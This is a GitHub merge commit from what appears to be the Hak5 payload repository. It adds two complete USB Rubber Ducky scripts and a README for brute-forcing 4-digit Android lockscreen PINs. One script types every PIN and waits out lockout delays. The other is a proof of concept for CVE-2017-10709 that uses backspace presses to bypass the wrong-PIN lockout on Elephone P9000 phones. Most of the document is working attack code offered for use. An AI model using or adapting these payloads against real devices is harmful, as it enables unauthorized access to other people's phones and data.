Merge pull request #201 from cribb-it/AndroidBrute

New Payload - Brute Force
pull/204/head
hak5glytch 2023-01-02 14:31:50 -08:00 committed by GitHub
commit 8f720110d3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 554 additions and 0 deletions

View File

@ -0,0 +1,274 @@
ATTACKMODE HID
REM TITLE: Brute Force
REM AUTHOR: Cribbit
REM DESCRIPTION: Updated Version of Hak5 episode 1217.1
REM VID URL: https://www.youtube.com/watch?v=yoYiEkk5TyI
REM NOTE: This is 10 year old so will not work with modern android
REM PROPS: Hak5Darren
DELAY 3000
EXTENSION TRANSLATE
REM VERSION 1.0
REM This extension acts as a library or collection of helper functions
REM to work with converting variables in your payloads.
REM WHY:
REM Of the many ways to get information about the state of your payload
REM is by injecting static strings effectively as debugging prints
REM However, given the non-static nature of payloads using variables in
REM DuckyScript 3.0 - the ability to decode variables during payload
REM execution and print (inject) representations of their current state
REM can often be a critically helpful development and debugging tool.
REM Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE:
REM set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234
REM $INPUT = $myVar
REM TRANSLATE_INT()
REM REM the above code will inject 1234
REM begin extension variables
DEFINE PRINT_INT 0
DEFINE PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = PRINT_INT
VAR $D = 0
VAR $IN = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
VAR $NL = TRUE
REM end extension variables
REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT()
IF ($D == 0) THEN
STRING 0
ELSE IF ($D == 1) THEN
STRING 1
ELSE IF ($D == 2) THEN
STRING 2
ELSE IF ($D == 3) THEN
STRING 3
ELSE IF ($D == 4) THEN
STRING 4
ELSE IF ($D == 5) THEN
STRING 5
ELSE IF ($D == 6) THEN
STRING 6
ELSE IF ($D == 7) THEN
STRING 7
ELSE IF ($D == 8) THEN
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
ELSE
STRING ?
END_IF
END_FUNCTION
REM REQUIRED for INT/HEX- consumes a character / place from the input
FUNCTION CONSUME()
$D = 0
WHILE ($INPUT >= $MOD)
$D = ($D + 1)
$INPUT = ($INPUT - $MOD)
END_WHILE
IF (($D > 0) || ($P == TRUE)) THEN
$P = TRUE
PRINTDIGIT()
END_IF
END_FUNCTION
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
CONSUME()
END_IF
IF (($INPUT >= 1000) || ($P == TRUE)) THEN
$MOD = 1000
CONSUME()
END_IF
IF (($INPUT >= 100) || ($P == TRUE)) THEN
$MOD = 100
CONSUME()
END_IF
IF (($INPUT >= 10) || ($P == TRUE)) THEN
$MOD = 10
CONSUME()
END_IF()
$D = $INPUT
PRINTDIGIT()
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation
FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
STRING 0x0000
ELSE IF ($chars == 1) THEN
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $NL THEN
ENTER
END_IF
END_FUNCTION
END_EXTENSION
REM Turn off TRANSLATE newline
$NL = FALSE
VAR $Frist = 0
VAR $Second = 0
VAR $Third = 0
VAR $Forth = 0
VAR $WaitTime = 30000
VAR $WaitStep = 5000
VAR $WaitDiff = 0
VAR $Cnt = 0
WHILE ($Frist < 10)
$Second = 0
WHILE ($Second < 10)
$Third = 0
WHILE ($Third < 10)
$Forth = 0
WHILE ($Forth < 10)
$INPUT = $Frist
TRANSLATE_INT()
$INPUT = $Second
TRANSLATE_INT()
$INPUT = $Third
TRANSLATE_INT()
$INPUT = $Forth
TRANSLATE_INT()
$Forth = ($Forth + 1)
DELAY 1000
ENTER
ENTER
$Cnt = ($Cnt + 1)
IF ($Cnt == 5) THEN
$Cnt = 0
WHILE ($WaitDiff < $WaitTime)
DELAY $WaitStep
ENTER
$WaitDiff = ($WaitDiff + $WaitStep)
END_WHILE
$WaitDiff = 0
END_IF
END_WHILE
$Third = ($Third + 1)
END_WHILE
$Second = ($Second + 1)
END_WHILE
$Frist = ($Frist + 1)
END_WHILE

View File

@ -0,0 +1,259 @@
ATTACKMODE HID
REM TITLE: Brute Force
REM AUTHOR: Cribbit
REM DESCRIPTION: POC of CVE-2017-10709 using a Ducky. The lockscreen on Elephone P9000 devices (running Android 6.0) allows physically proximate attackers to bypass a wrong-PIN lockout feature by pressing backspace after each PIN guess.
REM PROPS: Kalani & Shinichi Kudo
DELAY 3000
EXTENSION TRANSLATE
REM VERSION 1.0
REM This extension acts as a library or collection of helper functions
REM to work with converting variables in your payloads.
REM WHY:
REM Of the many ways to get information about the state of your payload
REM is by injecting static strings effectively as debugging prints
REM However, given the non-static nature of payloads using variables in
REM DuckyScript 3.0 - the ability to decode variables during payload
REM execution and print (inject) representations of their current state
REM can often be a critically helpful development and debugging tool.
REM Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE:
REM set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234
REM $INPUT = $myVar
REM TRANSLATE_INT()
REM REM the above code will inject 1234
REM begin extension variables
DEFINE PRINT_INT 0
DEFINE PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = PRINT_INT
VAR $D = 0
VAR $IN = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
VAR $NL = TRUE
REM end extension variables
REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT()
IF ($D == 0) THEN
STRING 0
ELSE IF ($D == 1) THEN
STRING 1
ELSE IF ($D == 2) THEN
STRING 2
ELSE IF ($D == 3) THEN
STRING 3
ELSE IF ($D == 4) THEN
STRING 4
ELSE IF ($D == 5) THEN
STRING 5
ELSE IF ($D == 6) THEN
STRING 6
ELSE IF ($D == 7) THEN
STRING 7
ELSE IF ($D == 8) THEN
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
ELSE
STRING ?
END_IF
END_FUNCTION
REM REQUIRED for INT/HEX- consumes a character / place from the input
FUNCTION CONSUME()
$D = 0
WHILE ($INPUT >= $MOD)
$D = ($D + 1)
$INPUT = ($INPUT - $MOD)
END_WHILE
IF (($D > 0) || ($P == TRUE)) THEN
$P = TRUE
PRINTDIGIT()
END_IF
END_FUNCTION
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
CONSUME()
END_IF
IF (($INPUT >= 1000) || ($P == TRUE)) THEN
$MOD = 1000
CONSUME()
END_IF
IF (($INPUT >= 100) || ($P == TRUE)) THEN
$MOD = 100
CONSUME()
END_IF
IF (($INPUT >= 10) || ($P == TRUE)) THEN
$MOD = 10
CONSUME()
END_IF()
$D = $INPUT
PRINTDIGIT()
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation
FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
STRING 0x0000
ELSE IF ($chars == 1) THEN
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $NL THEN
ENTER
END_IF
END_FUNCTION
END_EXTENSION
REM Turn off TRANSLATE newline
$NL = FALSE
VAR $Frist = 0
VAR $Second = 0
VAR $Third = 0
VAR $Forth = 0
WHILE ($Frist < 10)
$INPUT = $Frist
TRANSLATE_INT()
$Second = 0
WHILE ($Second < 10)
$INPUT = $Second
TRANSLATE_INT()
$Third = 0
WHILE ($Third < 10)
$INPUT = $Third
TRANSLATE_INT()
$Forth = 0
WHILE ($Forth < 10)
$INPUT = $Forth
TRANSLATE_INT()
$Forth = ($Forth + 1)
DELAY 1000
BACKSPACE
END_WHILE
$Third = ($Third + 1)
BACKSPACE
END_WHILE
$Second = ($Second + 1)
BACKSPACE
END_WHILE
$Frist = ($Frist + 1)
BACKSPACE
END_WHILE

View File

@ -0,0 +1,21 @@
# Brute Force
- Author: Cribbit
- Version: 1.0
- Target: Android < 6 (I think)
- Category: Mobile
- Attackmode: HID
- Props: *[Hak5Darren](https://github.com/hak5darren)* for original idea, *[Kalani](https://github.com/kalanihelekunihi)* & Shinichi Kudo for info on backspace CVE
## Description
An updated version of Hak5 episode 1217.1 android pin brute force method using just Ducky Script 3. Please not this brute force method is at least 10-year-old at time of writing. So, will not work on modern android phones. But give you a PoC of a way it could of be written.
There is also a version to work with CVE-2017-10709 that uses backspaces.
Click the image below to watch the original Hak5 Video:
[![Hak5 1217.1, Hack any 4-digit Android PIN in 16 hours with a USB Rubber Ducky](https://img.youtube.com/vi/yoYiEkk5TyI/0.jpg)](https://www.youtube.com/watch?v=yoYiEkk5TyI)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |